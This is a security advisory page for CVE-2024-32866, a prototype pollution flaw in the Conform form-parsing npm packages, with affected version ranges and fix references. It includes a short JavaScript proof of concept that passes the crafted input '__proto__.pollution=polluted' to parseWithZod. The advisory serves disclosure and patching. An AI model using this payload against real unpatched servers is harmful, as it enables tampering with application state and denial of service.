GHSA-624G-8QJG-8QXF

Vulnerability from github – Published: 2024-04-23 21:15 – Updated: 2024-06-10 20:12
VLAI?
Summary
Conform contains a Prototype Pollution Vulnerability in `parseWith...` function
Details

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod"); 

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });

parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

let pointer = value;

pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;

pointer.polluted = "polluted";

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Severity ?
8.6 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/dom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/zod"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/yup"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/zod"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/yup"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@conform-to/dom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-32866"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-23T21:15:55Z",
    "nvd_published_at": "2024-04-23T21:15:48Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nConform allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to `parseWith...` functions.\n\n### PoC\n```javascript\nconst { parseWithZod } = require(\u0027@conform-to/zod\u0027);\nconst { z } = require(\"zod\"); \n\nconst param = new URLSearchParams(\"__proto__.pollution=polluted\");\nconst schema = z.object({ \"a\": z.string() });\n\nparseWithZod(param, { schema });\nconsole.log(\"pollution:\", ({}).pollution); // should print \"polluted\"\n```\n\n### Details\n\nThe invocation of the `parseWithZod` function in the above PoC triggers the `setValue` function through `getSubmissionContext` and `parse`, executing the following process, resulting in prototype pollution:\n\n```javascript\nlet pointer = value;\n\npointer.__proto__ = pointer.__proto__;\npointer = pointer.__proto__;\n\npointer.polluted = \"polluted\";\n```\n\nThis is caused by the lack of object existence checking on [line 117 in formdata.ts](https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117), where the code only checks for the presence of `pointer[key]` without proper validation.\n\n### Impact\nApplications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.\n",
  "id": "GHSA-624g-8qjg-8qxf",
  "modified": "2024-06-10T20:12:58Z",
  "published": "2024-04-23T21:15:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/edmundhung/conform/security/advisories/GHSA-624g-8qjg-8qxf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32866"
    },
    {
      "type": "WEB",
      "url": "https://github.com/edmundhung/conform/commit/4819d51b5a53fd5486fc85c17cdc148eb160e3de"
    },
    {
      "type": "WEB",
      "url": "https://github.com/edmundhung/conform/commit/cb604dd58b99e2d12716d901a23bfca724e741ef"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/edmundhung/conform"
    },
    {
      "type": "WEB",
      "url": "https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Conform contains a Prototype Pollution Vulnerability in `parseWith...` function"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.